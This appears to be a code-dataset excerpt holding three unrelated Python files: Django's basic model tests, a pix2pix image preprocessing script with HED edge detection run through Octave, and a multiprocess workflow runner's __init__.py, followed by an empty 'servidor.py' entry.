source
stringlengths
3
86
python
stringlengths
75
1.04M
tests.py
import threading from datetime import datetime, timedelta from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections from django.db.models.manager import BaseManager from django.db.models.query import EmptyQuerySet, QuerySet from django.test import ( SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature, ) from django.utils.translation import gettext_lazy from .models import Article, ArticleSelectOnSave, FeaturedArticle, SelfRef class ModelInstanceCreationTests(TestCase): def test_object_is_not_written_to_database_until_save_was_called(self): a = Article( id=None, headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertIsNone(a.id) self.assertEqual(Article.objects.all().count(), 0) # Save it into the database. You have to call save() explicitly. a.save() self.assertIsNotNone(a.id) self.assertEqual(Article.objects.all().count(), 1) def test_can_initialize_model_instance_using_positional_arguments(self): """ You can initialize a model instance using positional arguments, which should match the field order as defined in the model. """ a = Article(None, 'Second article', datetime(2005, 7, 29)) a.save() self.assertEqual(a.headline, 'Second article') self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0)) def test_can_create_instance_using_kwargs(self): a = Article( id=None, headline='Third article', pub_date=datetime(2005, 7, 30), ) a.save() self.assertEqual(a.headline, 'Third article') self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0)) def test_autofields_generate_different_values_for_each_instance(self): a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0)) self.assertNotEqual(a3.id, a1.id) self.assertNotEqual(a3.id, a2.id) def test_can_mix_and_match_position_and_kwargs(self): # You can also mix and match position and keyword arguments, but # be sure not to duplicate field information. a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Fourth article') def test_cannot_create_instance_with_invalid_kwargs(self): with self.assertRaisesMessage(TypeError, "'foo' is an invalid keyword argument for this function"): Article( id=None, headline='Some headline', pub_date=datetime(2005, 7, 31), foo='bar', ) def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self): """ You can leave off the value for an AutoField when creating an object, because it'll get filled in automatically when you save(). """ a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Article 5') self.assertIsNotNone(a.id) def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self): a = Article(pub_date=datetime(2005, 7, 31)) a.save() self.assertEqual(a.headline, 'Default headline') def test_for_datetimefields_saves_as_much_precision_as_was_given(self): """as much precision in *seconds*""" a1 = Article( headline='Article 7', pub_date=datetime(2005, 7, 31, 12, 30), ) a1.save() self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30)) a2 = Article( headline='Article 8', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a2.save() self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45)) def test_saving_an_object_again_does_not_create_a_new_object(self): a = Article(headline='original', pub_date=datetime(2014, 5, 16)) a.save() current_id = a.id a.save() self.assertEqual(a.id, current_id) a.headline = 'Updated headline' a.save() self.assertEqual(a.id, current_id) def test_querysets_checking_for_membership(self): headlines = [ 'Parrot programs in Python', 'Second article', 'Third article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() a = Article(headline='Some headline', pub_date=some_pub_date) a.save() # You can use 'in' to test for membership... self.assertIn(a, Article.objects.all()) # ... but there will often be more efficient ways if that is all you need: self.assertTrue(Article.objects.filter(id=a.id).exists()) class ModelTest(TestCase): def test_objects_attribute_is_only_available_on_the_class_itself(self): with self.assertRaisesMessage(AttributeError, "Manager isn't accessible via Article instances"): getattr(Article(), "objects",) self.assertFalse(hasattr(Article(), 'objects')) self.assertTrue(hasattr(Article, 'objects')) def test_queryset_delete_removes_all_items_in_that_queryset(self): headlines = [ 'An article', 'Article One', 'Amazing article', 'Boring article'] some_pub_date = datetime(2014, 5, 16, 12, 1) for headline in headlines: Article(headline=headline, pub_date=some_pub_date).save() self.assertQuerysetEqual( Article.objects.all().order_by('headline'), ["<Article: Amazing article>", "<Article: An article>", "<Article: Article One>", "<Article: Boring article>"] ) Article.objects.filter(headline__startswith='A').delete() self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"]) def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self): some_pub_date = datetime(2014, 5, 16, 12, 1) a1 = Article.objects.create(headline='First', pub_date=some_pub_date) a2 = Article.objects.create(headline='Second', pub_date=some_pub_date) self.assertNotEqual(a1, a2) self.assertEqual(a1, Article.objects.get(id__exact=a1.id)) self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id)) def test_microsecond_precision(self): a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180)) def test_manually_specify_primary_key(self): # You can manually specify the primary key when creating a new object. a101 = Article( id=101, headline='Article 101', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a101.save() a101 = Article.objects.get(pk=101) self.assertEqual(a101.headline, 'Article 101') def test_create_method(self): # You can create saved objects in a single step a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) self.assertEqual(Article.objects.get(headline="Article 10"), a10) def test_year_lookup_edge_case(self): # Edge-case test: A year lookup should retrieve all objects in # the given year, including Jan. 1 and Dec. 31. Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2008), ["<Article: Article 11>", "<Article: Article 12>"] ) def test_unicode_data(self): # Unicode data works, too. a = Article( headline='\u6797\u539f \u3081\u3050\u307f', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f') def test_hash_function(self): # Model instances have a hash function, so they can be used in sets # or as dictionary keys. Two models compare as equal if their primary # keys are equal. a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a11 = Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) a12 = Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) s = {a10, a11, a12} self.assertIn(Article.objects.get(headline='Article 11'), s) def test_extra_method_select_argument_with_dashes_and_values(self): # The 'select' argument to extra() supports names with dashes in # them, as long as you use values(). Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) dicts = Article.objects.filter( pub_date__year=2008).extra( select={'dashed-value': '1'}).values('headline', 'dashed-value') self.assertEqual( [sorted(d.items()) for d in dicts], [[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]] ) def test_extra_method_select_argument_with_dashes(self): # If you use 'select' with extra() and names containing dashes on a # query that's *not* a values() query, those extra 'select' values # will silently be ignored. Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) articles = Article.objects.filter( pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'}) self.assertEqual(articles[0].undashedvalue, 2) def test_create_relation_with_gettext_lazy(self): """ gettext_lazy objects work when saving model instances through various methods. Refs #10498. """ notlazy = 'test' lazy = gettext_lazy(notlazy) Article.objects.create(headline=lazy, pub_date=datetime.now()) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # test that assign + save works with Promise objects article.headline = lazy article.save() self.assertEqual(article.headline, notlazy) # test .update() Article.objects.update(headline=lazy) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # still test bulk_create() Article.objects.all().delete() Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())]) article = Article.objects.get() self.assertEqual(article.headline, notlazy) def test_emptyqs(self): msg = "EmptyQuerySet can't be instantiated" with self.assertRaisesMessage(TypeError, msg): EmptyQuerySet() self.assertIsInstance(Article.objects.none(), EmptyQuerySet) self.assertNotIsInstance('', EmptyQuerySet) def test_emptyqs_values(self): # test for #15959 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): qs = Article.objects.none().values_list('pk') self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(len(qs), 0) def test_emptyqs_customqs(self): # A hacky test for custom QuerySet subclass - refs #17271 Article.objects.create(headline='foo', pub_date=datetime.now()) class CustomQuerySet(QuerySet): def do_something(self): return 'did something' qs = Article.objects.all() qs.__class__ = CustomQuerySet qs = qs.none() with self.assertNumQueries(0): self.assertEqual(len(qs), 0) self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(qs.do_something(), 'did something') def test_emptyqs_values_order(self): # Tests for ticket #17712 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().filter( id__in=Article.objects.values_list('id', flat=True))), 0) @skipUnlessDBFeature('can_distinct_on_fields') def test_emptyqs_distinct(self): # Tests for #19426 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0) def test_ticket_20278(self): sr = SelfRef.objects.create() with self.assertRaises(ObjectDoesNotExist): SelfRef.objects.get(selfref=sr) def test_eq(self): self.assertEqual(Article(id=1), Article(id=1)) self.assertNotEqual(Article(id=1), object()) self.assertNotEqual(object(), Article(id=1)) a = Article() self.assertEqual(a, a) self.assertNotEqual(Article(), a) def test_hash(self): # Value based on PK self.assertEqual(hash(Article(id=1)), hash(1)) msg = 'Model instances without primary key value are unhashable' with self.assertRaisesMessage(TypeError, msg): # No PK value -> unhashable (because save() would then change # hash) hash(Article()) def test_delete_and_access_field(self): # Accessing a field after it's deleted from a model reloads its value. pub_date = datetime.now() article = Article.objects.create(headline='foo', pub_date=pub_date) new_pub_date = article.pub_date + timedelta(days=10) article.headline = 'bar' article.pub_date = new_pub_date del article.headline with self.assertNumQueries(1): self.assertEqual(article.headline, 'foo') # Fields that weren't deleted aren't reloaded. self.assertEqual(article.pub_date, new_pub_date) class ModelLookupTest(TestCase): def setUp(self): # Create an Article. self.a = Article( id=None, headline='Swallow programs in Python', pub_date=datetime(2005, 7, 28), ) # Save it into the database. You have to call save() explicitly. self.a.save() def test_all_lookup(self): # Change values by changing the attributes, then calling save(). self.a.headline = 'Parrot programs in Python' self.a.save() # Article.objects.all() returns all the articles in the database. self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>']) def test_rich_lookup(self): # Django provides a rich database lookup API. self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a) self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a) self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a) def test_equal_lookup(self): # The "__exact" lookup type can be omitted, as a shortcut. self.assertEqual(Article.objects.get(id=self.a.id), self.a) self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2004), [], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005, pub_date__month=7), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=5), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=6), [], ) def test_does_not_exist(self): # Django raises an Article.DoesNotExist exception for get() if the # parameters don't match any object. with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."): Article.objects.get(id__exact=2000,) # To avoid dict-ordering related errors check only one lookup # in single assert. with self.assertRaises(ObjectDoesNotExist): Article.objects.get(pub_date__year=2005, pub_date__month=8) with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."): Article.objects.get(pub_date__week_day=6,) def test_lookup_by_primary_key(self): # Lookup by a primary key is the most common case, so Django # provides a shortcut for primary-key exact lookups. # The following is identical to articles.get(id=a.id). self.assertEqual(Article.objects.get(pk=self.a.id), self.a) # pk can be used as a shortcut for the primary key name in any query. self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"]) # Model instances of the same type and same ID are considered equal. a = Article.objects.get(pk=self.a.id) b = Article.objects.get(pk=self.a.id) self.assertEqual(a, b) def test_too_many(self): # Create a very similar object a = Article( id=None, headline='Swallow bites Python', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.count(), 2) # Django raises an Article.MultipleObjectsReturned exception if the # lookup matches more than one object msg = "get() returned more than one Article -- it returned 2!" with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(headline__startswith='Swallow',) with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(pub_date__year=2005,) with self.assertRaisesMessage(MultipleObjectsReturned, msg): Article.objects.get(pub_date__year=2005, pub_date__month=7) class ConcurrentSaveTests(TransactionTestCase): available_apps = ['basic'] @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_concurrent_delete_with_save(self): """ Test fetching, deleting and finally saving an object - we should get an insert in this case. """ a = Article.objects.create(headline='foo', pub_date=datetime.now()) exceptions = [] def deleter(): try: # Do not delete a directly - doing so alters its state. Article.objects.filter(pk=a.pk).delete() except Exception as e: exceptions.append(e) finally: connections[DEFAULT_DB_ALIAS].close() self.assertEqual(len(exceptions), 0) t = threading.Thread(target=deleter) t.start() t.join() a.save() self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo') class ManagerTest(SimpleTestCase): QUERYSET_PROXY_METHODS = [ 'none', 'count', 'dates', 'datetimes', 'distinct', 'extra', 'get', 'get_or_create', 'update_or_create', 'create', 'bulk_create', 'filter', 'aggregate', 'annotate', 'complex_filter', 'exclude', 'in_bulk', 'iterator', 'earliest', 'latest', 'first', 'last', 'order_by', 'select_for_update', 'select_related', 'prefetch_related', 'values', 'values_list', 'update', 'reverse', 'defer', 'only', 'using', 'exists', '_insert', '_update', 'raw', 'union', 'intersection', 'difference', ] def test_manager_methods(self): """ This test ensures that the correct set of methods from `QuerySet` are copied onto `Manager`. It's particularly useful to prevent accidentally leaking new methods into `Manager`. New `QuerySet` methods that should also be copied onto `Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`. """ self.assertEqual( sorted(BaseManager._get_queryset_methods(QuerySet)), sorted(self.QUERYSET_PROXY_METHODS), ) class SelectOnSaveTests(TestCase): def test_select_on_save(self): a1 = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(1): a1.save() asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(2): asos.save() with self.assertNumQueries(1): asos.save(force_update=True) Article.objects.all().delete() with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'): with self.assertNumQueries(1): asos.save(force_update=True) def test_select_on_save_lying_update(self): """ select_on_save works correctly if the database doesn't return correct information about matched rows from UPDATE. """ # Change the manager to not return "row matched" for update(). # We are going to change the Article's _base_manager class # dynamically. This is a bit of a hack, but it seems hard to # test this properly otherwise. Article's manager, because # proxy models use their parent model's _base_manager. orig_class = Article._base_manager._queryset_class class FakeQuerySet(QuerySet): # Make sure the _update method below is in fact called. called = False def _update(self, *args, **kwargs): FakeQuerySet.called = True super()._update(*args, **kwargs) return 0 try: Article._base_manager._queryset_class = FakeQuerySet asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(3): asos.save() self.assertTrue(FakeQuerySet.called) # This is not wanted behavior, but this is how Django has always # behaved for databases that do not return correct information # about matched rows for UPDATE. with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'): asos.save(force_update=True) msg = ( "An error occurred in the current transaction. You can't " "execute queries until the end of the 'atomic' block." ) with self.assertRaisesMessage(DatabaseError, msg): asos.save(update_fields=['pub_date']) finally: Article._base_manager._queryset_class = orig_class class ModelRefreshTests(TestCase): def test_refresh(self): a = Article.objects.create(pub_date=datetime.now()) Article.objects.create(pub_date=datetime.now()) Article.objects.filter(pk=a.pk).update(headline='new headline') with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.headline, 'new headline') orig_pub_date = a.pub_date new_pub_date = a.pub_date + timedelta(10) Article.objects.update(headline='new headline 2', pub_date=new_pub_date) with self.assertNumQueries(1): a.refresh_from_db(fields=['headline']) self.assertEqual(a.headline, 'new headline 2') self.assertEqual(a.pub_date, orig_pub_date) with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.pub_date, new_pub_date) def test_unknown_kwarg(self): s = SelfRef.objects.create() msg = "refresh_from_db() got an unexpected keyword argument 'unknown_kwarg'" with self.assertRaisesMessage(TypeError, msg): s.refresh_from_db(unknown_kwarg=10) def test_refresh_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create() s3 = SelfRef.objects.create(selfref=s1) s3_copy = SelfRef.objects.get(pk=s3.pk) s3_copy.selfref.touched = True s3.selfref = s2 s3.save() with self.assertNumQueries(1): s3_copy.refresh_from_db() with self.assertNumQueries(1): # The old related instance was thrown away (the selfref_id has # changed). It needs to be reloaded on access, so one query # executed. self.assertFalse(hasattr(s3_copy.selfref, 'touched')) self.assertEqual(s3_copy.selfref, s2) def test_refresh_null_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create(selfref=s1) s2.selfref = None s2.refresh_from_db() self.assertEqual(s2.selfref, s1) def test_refresh_unsaved(self): pub_date = datetime.now() a = Article.objects.create(pub_date=pub_date) a2 = Article(id=a.pk) with self.assertNumQueries(1): a2.refresh_from_db() self.assertEqual(a2.pub_date, pub_date) self.assertEqual(a2._state.db, "default") def test_refresh_fk_on_delete_set_null(self): a = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) s1 = SelfRef.objects.create(article=a) a.delete() s1.refresh_from_db() self.assertIsNone(s1.article_id) self.assertIsNone(s1.article) def test_refresh_no_fields(self): a = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(0): a.refresh_from_db(fields=[]) def test_refresh_clears_reverse_related(self): """refresh_from_db() clear cached reverse relations.""" article = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) self.assertFalse(hasattr(article, 'featured')) FeaturedArticle.objects.create(article_id=article.pk) article.refresh_from_db() self.assertTrue(hasattr(article, 'featured')) def test_refresh_clears_one_to_one_field(self): article = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) featured = FeaturedArticle.objects.create(article_id=article.pk) self.assertEqual(featured.article.headline, 'Parrot programs in Python') article.headline = 'Parrot programs in Python 2.0' article.save() featured.refresh_from_db() self.assertEqual(featured.article.headline, 'Parrot programs in Python 2.0')
process.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse import os import tempfile import subprocess import tensorflow as tf import numpy as np import tfimage as im import threading import time import multiprocessing edge_pool = None parser = argparse.ArgumentParser() parser.add_argument("--input_dir", required=True, help="path to folder containing images") parser.add_argument("--output_dir", required=True, help="output path") parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"]) parser.add_argument("--workers", type=int, default=1, help="number of workers") # resize parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation") parser.add_argument("--size", type=int, default=1024, help="size to use for resize operation") # combine parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation") a = parser.parse_args() def resize(src): height, width, _ = src.shape dst = src if height != width: if a.pad: size = max(height, width) # pad to correct ratio oh = (size - height) // 2 ow = (size - width) // 2 dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size) else: # crop to correct ratio size = min(height, width) oh = (height - size) // 2 ow = (width - size) // 2 dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size) assert(dst.shape[0] == dst.shape[1]) size, _, _ = dst.shape if size > a.size: dst = im.downscale(images=dst, size=[a.size, a.size]) elif size < a.size: dst = im.upscale(images=dst, size=[a.size, a.size]) return dst def blank(src): height, width, _ = src.shape if height != width: raise Exception("non-square image") image_size = width size = int(image_size * 0.3) offset = int(image_size / 2 - size / 2) dst = src dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3]) return dst def combine(src, src_path): if a.b_dir is None: raise Exception("missing b_dir") # find corresponding file in b_dir, could have a different extension basename, _ = os.path.splitext(os.path.basename(src_path)) for ext in [".png", ".jpg"]: sibling_path = os.path.join(a.b_dir, basename + ext) if os.path.exists(sibling_path): sibling = im.load(sibling_path) break else: raise Exception("could not find sibling image for " + src_path) # make sure that dimensions are correct height, width, _ = src.shape if height != sibling.shape[0] or width != sibling.shape[1]: raise Exception("differing sizes") # convert both images to RGB if necessary if src.shape[2] == 1: src = im.grayscale_to_rgb(images=src) if sibling.shape[2] == 1: sibling = im.grayscale_to_rgb(images=sibling) # remove alpha channel if src.shape[2] == 4: src = src[:,:,:3] if sibling.shape[2] == 4: sibling = sibling[:,:,:3] return np.concatenate([src, sibling], axis=1) def grayscale(src): return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src)) net = None def run_caffe(src): # lazy load caffe and create net global net if net is None: # don't require caffe unless we are doing edge detection os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe import caffe # using this requires using the docker image or assembling a bunch of dependencies # and then changing these hardcoded paths net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST) net.blobs["data"].reshape(1, *src.shape) net.blobs["data"].data[...] = src net.forward() return net.blobs["sigmoid-fuse"].data[0][0,:,:] def edges(src): # based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py # and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m import scipy.io src = src * 255 border = 128 # put a padding around images since edge detection seems to detect edge of image src = src[:,:,:3] # remove alpha channel if present src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect") src = src[:,:,::-1] src -= np.array((104.00698793,116.66876762,122.67891434)) src = src.transpose((2, 0, 1)) # [height, width, channels] => [batch, channel, height, width] fuse = edge_pool.apply(run_caffe, [src]) fuse = fuse[border:-border, border:-border] with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file: scipy.io.savemat(mat_file.name, {"input": fuse}) octave_code = r""" E = 1-load(input_path).input; E = imresize(E, [image_width,image_width]); E = 1 - E; E = single(E); [Ox, Oy] = gradient(convTri(E, 4), 1); [Oxx, ~] = gradient(Ox, 1); [Oxy, Oyy] = gradient(Oy, 1); O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi); E = edgesNmsMex(E, O, 1, 5, 1.01, 1); E = double(E >= max(eps, threshold)); E = bwmorph(E, 'thin', inf); E = bwareaopen(E, small_edge); E = 1 - E; E = uint8(E * 255); imwrite(E, output_path); """ config = dict( input_path="'%s'" % mat_file.name, output_path="'%s'" % png_file.name, image_width=1024, threshold=25.0/255.0, small_edge=5, ) args = ["octave"] for k, v in config.items(): args.extend(["--eval", "%s=%s;" % (k, v)]) args.extend(["--eval", octave_code]) try: subprocess.check_output(args, stderr=subprocess.STDOUT) except subprocess.CalledProcessError as e: print("octave failed") print("returncode:", e.returncode) print("output:", e.output) raise return im.load(png_file.name) def process(src_path, dst_path): src = im.load(src_path) if a.operation == "grayscale": dst = grayscale(src) elif a.operation == "resize": dst = resize(src) elif a.operation == "blank": dst = blank(src) elif a.operation == "combine": dst = combine(src, src_path) elif a.operation == "edges": dst = edges(src) else: raise Exception("invalid operation") im.save(dst, dst_path) complete_lock = threading.Lock() start = None num_complete = 0 total = 0 def complete(): global num_complete, rate, last_complete with complete_lock: num_complete += 1 now = time.time() elapsed = now - start rate = num_complete / elapsed if rate > 0: remaining = (total - num_complete) / rate else: remaining = 0 print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60)) last_complete = now def main(): if not os.path.exists(a.output_dir): os.makedirs(a.output_dir) src_paths = [] dst_paths = [] skipped = 0 for src_path in im.find(a.input_dir): name, _ = os.path.splitext(os.path.basename(src_path)) dst_path = os.path.join(a.output_dir, name + ".png") if os.path.exists(dst_path): skipped += 1 else: src_paths.append(src_path) dst_paths.append(dst_path) print("skipping %d files that already exist" % skipped) global total total = len(src_paths) print("processing %d files" % total) global start start = time.time() if a.operation == "edges": # use a multiprocessing pool for this operation so it can use multiple CPUs # create the pool before we launch processing threads global edge_pool edge_pool = multiprocessing.Pool(a.workers) if a.workers == 1: with tf.Session() as sess: for src_path, dst_path in zip(src_paths, dst_paths): process(src_path, dst_path) complete() else: queue = tf.train.input_producer(zip(src_paths, dst_paths), shuffle=False, num_epochs=1) dequeue_op = queue.dequeue() def worker(coord): with sess.as_default(): while not coord.should_stop(): try: src_path, dst_path = sess.run(dequeue_op) except tf.errors.OutOfRangeError: coord.request_stop() break process(src_path, dst_path) complete() # init epoch counter for the queue local_init_op = tf.local_variables_initializer() with tf.Session() as sess: sess.run(local_init_op) coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(coord=coord) for i in range(a.workers): t = threading.Thread(target=worker, args=(coord,)) t.start() threads.append(t) try: coord.join(threads) except KeyboardInterrupt: coord.request_stop() coord.join(threads) main()
__init__.py
import sys from multiprocessing import Manager, Process import yaml import json from jsonschema import validate import os.path import logging from tempfile import mkstemp, mkdtemp import os import shutil from .dependentqueue import DependentQueue from .task import enqueue, EndOfQueue, either_data from .process import work_on from .io import read_from_disk, merge_files from .python import python_to_spec from .spec import dict_to_spec from .objectstore import PlasmaStore, SimpleStore from tx.readable_log import getLogger logger = getLogger(__name__, logging.INFO) with open(os.path.join(os.path.dirname(__file__), "schema.json")) as f: schema = json.load(f) def run_python(number_of_workers, pyf, dataf, system_paths=[], validate_spec=True, output_path=None, level=0, object_store=None): with open(pyf) as s: py = s.read() with open(dataf) as d: data = yaml.safe_load(d) return start_python(number_of_workers, py, data, system_paths, validate_spec, output_path, level, object_store) def run(number_of_workers, specf, dataf, system_paths=[], validate_spec=True, output_path=None, level=0, object_store=None): with open(specf) as s: spec = yaml.safe_load(s) with open(dataf) as d: data = yaml.safe_load(d) return start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store) def start_python(number_of_workers, py, data, system_paths, validate_spec, output_path, level, object_store): add_paths = list(set(system_paths) - set(sys.path)) sys.path.extend(add_paths) logger.debug(f"add_paths = {add_paths}") try: spec = python_to_spec(py) finally: for _ in range(len(add_paths)): sys.path.pop() return start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store) DEFAULT_PLASMA_STORE_SIZE = 50000000 def start(number_of_workers, spec, data, system_paths, validate_spec, output_path, level, object_store): if validate_spec: validate(instance=spec, schema=schema) if output_path is None: temp_dir = mkdtemp() else: with open(output_path, "w"): pass output_dir = os.path.dirname(output_path) temp_dir = mkdtemp(dir=output_dir) shutdown_object_store = False temp_path = None try: with Manager() as manager: if object_store is None: try: logger.info("using PlasmaStore") object_store = PlasmaStore(manager, DEFAULT_PLASMA_STORE_SIZE) except: logger.info("using SimpleStore") object_store = SimpleStore(manager) object_store.init() shutdown_object_store = True job_queue = DependentQueue(manager, EndOfQueue(), object_store) enqueue(dict_to_spec(spec), either_data(data), job_queue, level=level) processes = [] output_paths = [] for _ in range(number_of_workers): fd, path = mkstemp(dir=temp_dir) os.close(fd) output_paths.append(path) p = Process(target=work_on, args=(job_queue, path, system_paths)) p.start() processes.append(p) for p in processes: p.join() if output_path is None: fd, temp_path = mkstemp(dir=temp_dir) os.close(fd) else: temp_path = output_path merge_files(output_paths, temp_path) if output_path is None: return read_from_disk(temp_path) else: return None finally: if shutdown_object_store: object_store.shutdown() shutil.rmtree(temp_dir)
servidor.py
